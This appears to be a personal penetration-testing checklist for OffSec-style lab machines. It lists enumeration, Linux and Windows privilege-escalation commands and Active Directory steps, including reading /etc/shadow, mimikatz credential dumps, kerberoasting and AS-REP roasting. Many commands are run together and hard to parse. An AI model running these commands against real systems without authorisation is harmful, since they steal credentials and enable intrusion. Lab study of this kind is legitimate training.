Checklist to Run Every Time
Note that CMD+L is the key to create and check boxes
- unchecked
- [x]
Enumeration
nmap $IP- then
nmap -p- $IP -T4 - then
nmap -$ports -sC -A -T4 $IP -oN nmap - then
nmap -sU -T4 $IP smbclient -L \\\\$IP\\ -Nftp anonymous@$IPnxc smb -u '' -p '' $IP- This should be able to help you get the domain name
- Add name of box to
users.txtandpasswords.txt
Linux Foothold
./vbenum.sh./linpeas.sh./lse.sh -l1ps aux | grep -i 'root' --color=auto./pspy64ls /optls /var/html/wwwortree- or whatever the web directory is
tree /homefind / -perm -u=s -type f 2>/dev/nullfind / -writable -type d 2>/dev/nullfind / -type f -name *.conf 2>/dev/null/find / -type f -name *pass* 2>/dev/null
sudo -lcat /etc/passwdcat /etc/shadow
Windows Foothold
- Is there anything unusual in
C:\ - Is there anything unusual in
C:\Program Files systeminfopowershell Get-Historywhoami /privwhoami /groupsGet-Content "$HOME\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt".\winpeas.exetree /a /f C:\Usersfor anything that sticks outGet-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinueGet-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue- sub out xampp for other serverGet-ChildItem -Path C:\Users\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
AD Post Privesc
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "lsadump::secrets" "exit".\Rubeus.exe kerberoast /format:hashcat /nowrap /outfile:hashes.kerberoast.\Rubeus.exe asreproast /format:hashcat /nowrap /outfile:hashes.asreproastImport-Module .\adPEAS.ps1andInvoke-adPEASbloodhound-python -u $user -p '$password' -ns $ip -d domain.offsec -c all.\adPEAS-Light.ps1- Did you get all users of a domain with something like
sudo nxc smb $IP -u $user -p $password --users